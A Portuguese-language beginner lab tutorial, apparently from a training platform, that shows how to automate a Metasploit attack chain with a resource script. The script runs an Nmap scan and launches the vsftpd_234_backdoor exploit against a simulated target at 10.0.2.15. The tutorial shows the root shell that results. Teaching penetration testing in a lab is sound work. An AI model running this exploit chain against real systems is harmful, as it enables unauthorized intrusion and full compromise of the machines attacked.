Automatize Ataques com Scripts de Recursos do Metasploit

Kali LinuxBeginner
Pratique Agora

Introdução

Bem-vindo a este laboratório sobre automação de ataques com scripts de recursos do Metasploit. O Metasploit Framework é uma ferramenta poderosa para testes de penetração, mas digitar comandos manualmente para cada engajamento pode ser repetitivo e demorado. Scripts de recursos, que são arquivos de texto simples com a extensão .rc, permitem automatizar essas sequências de comandos.

Neste laboratório, você aprenderá a criar um script de recursos para automatizar uma cadeia de ataque completa contra um serviço vulnerável. Isso inclui configurar um workspace, escanear o alvo, selecionar um exploit, configurá-lo e lançar o ataque. Ao final deste laboratório, você será capaz de criar seus próprios scripts para otimizar seus fluxos de trabalho de testes de penetração.

Para este laboratório, teremos como alvo uma máquina vulnerável simulada. Assuma que o endereço IP da máquina alvo é 10.0.2.15.

Criar um novo arquivo com extensão .rc

Nesta etapa, você criará o arquivo de script de recursos. Um script de recursos do Metasploit é simplesmente um arquivo de texto contendo uma lista de comandos do msfconsole que são executados sequencialmente. Por convenção, esses arquivos têm a extensão .rc.

Usaremos o editor de texto nano para criar um arquivo chamado attack.rc no diretório padrão ~/project.

Abra seu terminal e execute o seguinte comando para criar e abrir o novo arquivo:

nano attack.rc

Este comando abrirá um arquivo vazio no editor nano. Por enquanto, apenas salve o arquivo vazio e saia do editor pressionando Ctrl+X, depois Y e, finalmente, Enter. Você agora criou o arquivo de script de recursos que preencherá nas próximas etapas.

Adicionar uma sequência de comandos msfconsole ao arquivo

Nesta etapa, você adicionará os comandos iniciais ao seu script de recursos. Esses comandos configurarão um workspace dedicado para nosso teste e executarão um escaneamento Nmap básico para coletar informações sobre o alvo. Organizar o trabalho em workspaces é uma boa prática no Metasploit.

Primeiro, abra o arquivo attack.rc novamente usando nano:

nano attack.rc

Agora, adicione as seguintes linhas ao arquivo. O primeiro comando cria um novo workspace chamado vsftpd_lab, e o segundo comando executa um escaneamento Nmap contra nosso alvo (10.0.2.15) e salva os resultados no banco de dados.

workspace -a vsftpd_lab
db_nmap -A 10.0.2.15

Após adicionar essas duas linhas, seu arquivo attack.rc deverá ficar exatamente assim. Salve o arquivo e saia do nano pressionando Ctrl+X, Y e Enter.

Incluir comandos para usar um exploit, definir opções e executar

Nesta etapa, você adicionará os comandos principais de ataque ao script. Nosso alvo será uma vulnerabilidade conhecida no servidor VSFTPD, especificamente o exploit vsftpd_234_backdoor. Você adicionará comandos para selecionar este exploit, definir a opção de alvo necessária e, finalmente, executá-lo.

Abra o arquivo attack.rc novamente com nano:

nano attack.rc

Anexe os seguintes comandos ao final do arquivo. Esses comandos instruem o Metasploit a:

  1. use exploit/unix/ftp/vsftpd_234_backdoor: Selecionar o módulo de exploit específico.
  2. set RHOSTS 10.0.2.15: Definir a opção RHOSTS (Remote Hosts) para o endereço IP do nosso alvo.
  3. exploit: Lançar o ataque.
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 10.0.2.15
exploit

Após adicionar essas linhas, seu arquivo attack.rc completo deverá agora conter os seguintes cinco comandos:

workspace -a vsftpd_lab
db_nmap -A 10.0.2.15
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 10.0.2.15
exploit

Salve as alterações e saia do editor nano (Ctrl+X, Y, Enter). Seu script de ataque automatizado está agora completo.

Iniciar o msfconsole com a flag -r para executar o script

Nesta etapa, você executará o script de recursos que acabou de criar. O console do Metasploit, msfconsole, pode ser iniciado com a flag -r seguida pelo caminho para um script de recursos. Isso informa ao Metasploit para executar os comandos do arquivo especificado na inicialização.

Certifique-se de que você está no diretório ~/project, onde seu arquivo attack.rc está localizado. Agora, execute o seguinte comando em seu terminal:

msfconsole -r attack.rc

Este comando iniciará o Metasploit Framework. Em vez de apresentar imediatamente o prompt usual msf6 >, ele começará a executar cada comando do attack.rc um por um.

Observe a execução automatizada da cadeia de ataque

Nesta etapa final, você observará os resultados do seu script automatizado. À medida que o msfconsole é executado, você verá a saída de cada comando em seu arquivo attack.rc. Você verá o workspace sendo criado, o scan Nmap sendo executado, o exploit sendo configurado e, finalmente, o ataque sendo lançado.

Se o ataque for bem-sucedido, o Metasploit abrirá uma sessão de shell de comando na máquina alvo. Você verá uma mensagem semelhante a esta:

[*] Found shell.
[*] Command shell session 1 opened (10.0.2.4:42931 -> 10.0.2.15:6200) at 2023-10-27 10:30:00 -0400

Você agora está em um shell na máquina alvo comprometida. Para verificar isso, você pode executar um comando como whoami para ver com qual usuário você está executando.

whoami

A saída esperada deve ser:

root

Isso confirma que seu script automatizado comprometeu com sucesso o alvo e obteve acesso root.

Para limpar, digite exit para fechar a sessão do shell de comando e, em seguida, digite exit novamente para sair do msfconsole.

Resumo

Neste laboratório, você aprendeu com sucesso como automatizar um fluxo de trabalho de teste de penetração usando scripts de recursos do Metasploit.

Você começou criando um arquivo de script de recursos (attack.rc). Em seguida, o preencheu com uma sequência de comandos do msfconsole para realizar uma cadeia de ataque completa: criação de um workspace, escaneamento do alvo, seleção e configuração de um exploit e, finalmente, o lançamento do ataque. Você aprendeu como executar este script usando o comando msfconsole -r e observou a execução automatizada.

Essa habilidade é inestimável para economizar tempo e garantir consistência em suas avaliações de segurança. Agora você pode criar scripts mais complexos para automatizar várias tarefas repetitivas em seus futuros engajamentos.